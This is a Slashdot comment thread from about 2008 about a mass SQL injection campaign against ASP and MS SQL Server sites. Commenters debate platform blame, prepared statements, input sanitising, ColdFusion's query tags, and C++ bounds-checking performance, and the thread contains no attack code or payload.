A mild correction; no-one runs a SQL injection attack against a web server, it's against the software that runs on that web server. So strictly no-one runs a SQL injection attack against apache, apache by default does not use any sql database; it's the same situation with IIS.

Bogus dupe of bogus story (0)

Anonymous Coward | more than 6 years ago | (#23230858)

It's not. The summary is bogus, just like when it was when it got posted last week.

Re:How does Apache avoid this? (1)

Foofoobar (318279) | more than 6 years ago | (#23230872)

Simple answer. mysql_real_escape_string [shiflett.org] . Instead of sanitizing data through the language which will miss byte encoded strings, alot of applications have switched to using MySQLs native mysql_real_escape_string which will catch these. Java sanitizes byte code strings as well I believe.

So it may be partially C# or just that Microsoft web devs are inherently 'dumber'.

Re:How does Apache avoid this? (1)

blowdart (31458) | more than 6 years ago | (#23231028)

asp.net sanitises by default; in fact it won't let certain strings be submitted as part of a form to protect against XSS. you have to specifically turn that off. c# also provides parametrised queries specifically to escape strings properly with any .net data provider.

A belief in the superiority of php developers isn't helpful, nor is it correct. I give a bunch of talks each year on this very topic and the amount of shocked php developers is pretty much the same as the amount of shocked asp.net developers. Part of the problem is no school teaches this stuff; security does not seem to be a part of any degree course I've encountered. Part of it is that the basic teach yourself books don't cover it either; asp.net/php for dummies will not list it, and database texts certainly don't, as it's not part of their domain. WordPress, Movable Type, Joomla! have all had SQL injection problems; Oracle has a great one right now which is a database level problem which defensive coding may not even catch to do with date parsing. It's not a question of one platform's developers being dumber, it's because no-one has ever warned them.

Re:How does Apache avoid this? (0)

Anonymous Coward | more than 6 years ago | (#23231110)

Oh good lord... 1998 called, and they want their bad ideas back.

Just use prepared statements, like every other decent developer in the world. Or even better, use stored procedures exclusively, and don't give your web stack insert, update, select, or delete permissions on your database.

Re:How does Apache avoid this? (1)

Joe U (443617) | more than 6 years ago | (#23231000)

Because the automated injection script was written for asp/asp.net and Apache rarely uses asp or asp.net.

Please scan your news sites for past and future php scripts if it makes you feel any better.

Re:How does Apache avoid this? (0)

Anonymous Coward | more than 6 years ago | (#23231022)

The exploit depends on a chunk of SQL that targets only Microsoft SQL Server [hackademix.net] . The slashdot "editors" think this is an IIS exploit because they don't know that IIS and MS SQL Server are two different products.

If someone wrote a generic script that targetted MySQL, I'm sure the idiots at Slashdot would post an article about a security hole in PHP.

Re:How does Apache avoid this? (1)

cliveholloway (132299) | more than 6 years ago | (#23231198)

There are two parts to this:

- no untainting of CGI data
- bad DB interaction practices

Now, I don't do ASP, so I'm unaware of the exact details, but in Perl (and any CGI language), it's always insane NOT to untaint your input submitted by users - even if (especially if!) you have set the values in hidden fields. Something like

my $id=0; # $id must be an integer under 100
$q->param('id') =~ /^(\d{1,2})$/
        and $id = $1;


And, as to the SQL injection itself, if ASP doesn't have placeholders, I would blame MicroSoft. Interpolating fields into DB statements is just asking for trouble.

FF fanboi? (0)

Anonymous Coward | more than 6 years ago | (#23230602)

So... a server side exploit is "defeated" with a client side browser + extension.

In case you go to a malicious site that makes you SQL exploit a 3rd party site?

Bad Language makes Bad Programs (1)

MarcAuslander (517215) | more than 6 years ago | (#23230662)

Bad language leads to bad programs. Classic example - C doesn't associate lengths with strings or arrays - and buffer overflows result. A SQL interface that requires/allows constructing strings which mix syntax and user data is asking for trouble. You can blame the programmer for not validating the input data - but unless you provide the validation tool, its still your fault - you the language designer.

Re:Bad Language makes Bad Programs (1)

ForumTroll (900233) | more than 6 years ago | (#23230992)

Bad programmers write bad code despite the language. I don't want to use a language that places a ridiculous number of restrictions on me merely because someone somewhere might find a way to fuck up. Furthermore, validating input is a library problem not a language problem, and practically every language has libraries for escaping input. Nobody is to blame but the developers of the project being exploited.

Re:Bad Language makes Bad Programs (1)

Wrath0fb0b (302444) | more than 6 years ago | (#23231142)

Bad language leads to bad programs. Classic example - C doesn't associate lengths with strings or arrays - and buffer overflows result. A SQL interface that requires/allows constructing strings which mix syntax and user data is asking for trouble. You can blame the programmer for not validating the input data - but unless you provide the validation tool, its still your fault - you the language designer.
Rubbish! You can have my C-style arrays when you pry them from my cold dead hands because, for my particular purpose, I don't need every access to check the bounds of the arrays. Please stop attempting to have the language force me to use the coding conventions that you prefer - the language should provide both safe and unsafe array access. This is the beauty of the C++ STL Vector class: it provides all the tools without judgment.

Let's take a stupidly simple example -- I want to write a function that returns the sum of a vector
template
inline T sum(const vector &lt T &gt &v) {
        T _sum = 0;
        for(unsigned i = 0, s = v.size(); i &lt s; ++i)
                _sum += v[i]; // NO NEED TO CHECK 'i' -- GUARANTEED TO BE IN BOUNDS //
        return _sum;
}

Sorry, Java users, your language specification will not allow you to access an array without a bounds-check (see the Java Language Spec, http://java.sun.com/docs/books/jls/third_edition/html/arrays.html#10.4 [sun.com] ). You are just SOL. I did a quick test summing up 10000000 random integers using the code above, and an identical version using vector.at() which does bounds-checking. The performance difference was greater than 3 times.

Here's the code if you don't believe me:

APPENDIX:

#include &lt iostream &gt
#include &lt vector &gt
#include &lt ctime &gt

using namespace std;

template &lt class T &gt
inline T sum_fast(const vector &lt T &gt &v) {
        T sum = 0;
        for(unsigned i = 0, s = v.size(); i &lt s; ++i)
                sum += v[i];
        return sum;
}

template &lt class T &gt
inline T sum_slow(const vector &lt T> &gt v) {
        T sum = 0;
        for(unsigned i = 0, s = v.size(); i &lt s; ++i)
                sum += v.at(i);
        return sum;
}

int main(void) {
        vector &lt int &gt a(10000000);
        for(unsigned i = 0, s = a.size(); i &lt s; ++i)
                a[i] = rand();

        clock_t start1 = clock();
        int res1 = sum_fast(a);
        clock_t end1 = clock();
        cout &lt&lt res1 &lt&lt " computed in " &lt&lt end1 - start1 &lt&lt " cycles\n";

        clock_t start2 = clock();
        int res2 = sum_slow(a);
        clock_t end2 = clock();
        cout &lt&lt res2 &lt&lt " computed in " &lt&lt end2 - start2 &lt&lt " cycles\n";
}

Produces the following output (MSVC 2K5 EE, all optimizations on)
614261309 computed in 15 cycles
614261309 computed in 47 cycles

Re:Bad Language makes Bad Programs (1)

Jaime2 (824950) | more than 6 years ago | (#23231186)

but unless you provide the validation tool, its still your fault - you the language designer
I'll bet 90% of the coding errors were done by developers who said "I hate those Visual Studio wizards Microsoft has for data access. I can do it better myself." Sure, the wizards aren't the best way to build an application, but at least they prevent SQL injection. I meet these people every day... they think they know a lot about programming, but really they are people with 20 years of experience just barely making applications work and developing more and more bad practices every day.

It's fine to reject the tools you are given. But if you reject them, at least have a better plan. ASP.Net has easy to use form validation tools, easy to use SQL injection preventing GUI data access tools, and easy to use base classes that prevent SQL injection. The people who made these problems avoided using about twenty tools at their disposal for avoiding this class of bug. This is certainly not Microsoft's fault.

Re:Bad Language makes Bad Programs (1)

XMyth (266414) | more than 6 years ago | (#23231248)

Microsoft is working towards eliminating the root of this problem (the problem being tunneled languages like SQL) with the addition of LINQ to .NET.

Why can't they block/blacklist domains? (1)

stun (782073) | more than 6 years ago | (#23230676)

Why can't they (the big guys) create an "Internet Police" to blacklist
certain domains from the Internet that are spreading those malwares?

I have read the news that some people have been working on finding out sites with malware on it using Google.
  1. Have the "Internet Police" contact the Web Admin of the "offending" site to clean up their own server.
  2. If they don't clean it up after a certain time, stop performing the DNS.


Ok, I *do* realize that this is really difficult and comes with crapload of legal and drama issues,
but I say we have to start from somewhere to take action on this.

And of course, some countries make it difficult (if not impossible)
to track down those malware spreaders *coughRussiacoughForExample* http://www.technewsworld.com/story/33127.html?welcome=1209421471/ [technewsworld.com]
and http://www.technewsworld.com/story/Researchers-Shed-Light-on-Shadowy-Russian-Botnets-60640.html/ [technewsworld.com] .

Now I say "Fuck those Russian bastards and their corrupted government and law enforcement agencies."

Coldfusion Anyone? (1)

oni (41625) | more than 6 years ago | (#23230726)

Has anyone ever heard of a SQL injection vulnerability in a Coldfusion app? I know some smartass is going to say, "that's because nobody uses it" but that's not true. If there are a million ASP apps out there and 500,000 SQL injection vulnerabilities, then there have to be at least 100,000 coldfusion sites. Show me the 50,000 coldfusion SQL injections. Or show me 10,000, or 5,000 or even just 1.

I have some experience with coldfusion and it is my opinion that a SQL injection vulnerability is pretty difficult to create even when you intend to create one. The reason is because, unlike every other language (java, ruby, PHP, etc.) coldfusion doesn't have this idea that you take any old random string and pass it off to the ODBC. Instead, you build the query inside special tags, and the interpreter can keep an eye out for errant quotes.

a SQL injection vulnerability in coldfusion will involve a special function, preserveSingleQuotes() that you only need in very rare circumstances.

So maybe everyone should switch to a safer language, eh?

Re:Coldfusion Anyone? (2, Informative)

S'harien (779928) | more than 6 years ago | (#23230954)

ColdFusion is most certainly vulnerable to SQL injection if you are not religiously using the CFQUERYPARAM tag inside your queries. Of course the database being queried needs to support multiple SQL statements in a single query (MySQL does, Access does not, can't speak for any others). http://www.adobe.com/devnet/coldfusion/articles/cfqueryparam.html [adobe.com]

Re:Coldfusion Anyone? (1)

isorox (205688) | more than 6 years ago | (#23231044)

Instead, you build the query inside special tags, and the interpreter can keep an eye out for errant quotes.

It's called a prepared statement

Re:Coldfusion Anyone? (0)

Anonymous Coward | more than 6 years ago | (#23231050)

ColdFusion is no more invulnerable to SQL injection than any other language and/or framework. The *only* thing it has in place by default is that beginning with CF6, single quotes were auto-escaped when used with cfquery unless PreserveSingleQuotes() is used then it's not even of any value there. That said; any injection attack that does not require the use of single quotes (e.g. an integer-based attack) will succeed without an aftermarket mitigation strategy in place (e.g. paramaterized queries, manually input validation or stored procs).

Re:Coldfusion Anyone? (1)

CodeBuster (516420) | more than 6 years ago | (#23231092)

I have some experience with coldfusion
coldfusion is dead or dying. You are the first person that I have heard mention it in years. If people are going to choose a proprietary solution for their web application server needs then they generally choose IIS with ASP.NET; otherwise the choice is probably PHP on Apache or Ruby on Rails.

So maybe everyone should switch to a safer language, eh?
The problem here is not the language it is the use of that language in ways that are specifically warned against as being dangerous. The power to create complex applications brings with it the possibility of self-destruction. The addition of power tools to your wood shop can expand productivity and open up new types of projects which were previously unavailable to you. On the other hand, you have to be careful with that circular saw or you might loose a few fingers. Power and complexity vs safety and simplicity but with limitations are trade offs that every developer must make.

Re:Coldfusion Anyone? (1)

kiddygrinder (605598) | more than 6 years ago | (#23231098)

nice idea, but i think the problem is more people doing things on the cheap instead of getting a real web dev so i don't think telling people to spend a large chunk of cash on coldfusion is going to fix it.

Re:Coldfusion Anyone? (1)

Sancho (17056) | more than 6 years ago | (#23231226)

If I were guessing, I'd say that Coldfusion has a fairly low market share. The main reason that I'd say this is that it's a) an expensive solution that b) isn't Microsoft.

Lots of people pick free solutions. Lots of people who don't pick free solutions know about IIS and MS SQL. They stick with Microsoft because it's the brand, and it's a one-stop shop for support. There are also a lot more VBS/.Net developers than Coldfusion ones, so developers will be cheaper.

That said, there are 38,000 hits from Google for coldfusion sql injection. Most of the hits in the first few pages aren't talking about how Coldfusion is magically immune. While that doesn't mean that it isn't, I know where I'd lay my money if I were a betting man.

Re:Coldfusion Anyone? (1)

XMyth (266414) | more than 6 years ago | (#23231264)

I'd rather eat cat vomit than write web apps with ColdFusion.

Thanks for the suggestion though.

Idiots. (-1, Flamebait)

Anonymous Coward | more than 6 years ago | (#23230770)

I would hope that idiots stop claiming this as a microsoft thing.

Because little do you know PHP and MySQL are far more worse for this crap happening.

Either way, it's not MS's tech fault that people are idiotic coders.

Let alone that those same idiotic coders don't run any baseline analyzing tools provided by microsoft to catch this shit!

Same Security Measures Apply Since 1996 (0)

Anonymous Coward | more than 6 years ago | (#23230816)

Hey, um, the same security guidelines for working with SQL code and various languages hasn't changed in over a decade guys... c'mon, this is really a pathetic takeover of the industry with people with the strongest immune systems and worst hygiene.

*puts on safety glasses*

Quicky Question (1)

udippel (562132) | more than 6 years ago | (#23231052)

From what I understand from just flippering through the summary,
The attack itself injects some malicious JavaScript code into every text field in your database, the Javascript then loads an external script that can compromise a user's PC
the infection requires that a local user on that database box browses the net, and hits a malicious site?

I really wonder, if users on database-running PC are supposed to browse the net, for pr0n, or what?

Am I correct that my fictitious boxen are free from danger, if I have no local losers' accounts for surfing?
 

Re:Quicky Question (2, Informative)

cervo (626632) | more than 6 years ago | (#23231136)

I think you misunderstand the article. The attack injects javascript code into the text fields of the database. The attack is done by someone exploiting SQL injection on the website. Nothing to do with a web surfing account on the database computer. The attack inserts Javascript into every text field. If it was a message forum, this might be the from fields of an e-mail, the message text of posts, the subject fields of posts, etc.... Regular users using the forum are suddenly exposed to the javascript.

Again (1)

isorox (205688) | more than 6 years ago | (#23231060)

Wow, that's awful, so soon after the last issue [slashdot.org] ?

little-bobby-tables-strikes-again dept (2, Funny)

cyberstealth1024 (860459) | more than 6 years ago | (#23231090)

from the little-bobby-tables-strikes-again dept.
Awesome xkcd reference! http://xkcd.com/327/ [xkcd.com]

The only story here... (1)

NullProg (70833) | more than 6 years ago | (#23231218)

Is that Linux, BSD, Sun, AIX, and whatever are just as vulnerable when it comes to dumb programmers.

The million dollar question is what platform and which web server is it easier to reinstall to get the site back up.
I think Linux and BSD have the advantage.

Enjoy,

In related news... (1)

gmuslera (3436) | more than 6 years ago | (#23231376)

Half a Millon Slashdot-Powered Stories Hit with Dupe Injection
Load More Comments
Slashdot Login

Need an Account?

Forgot your password?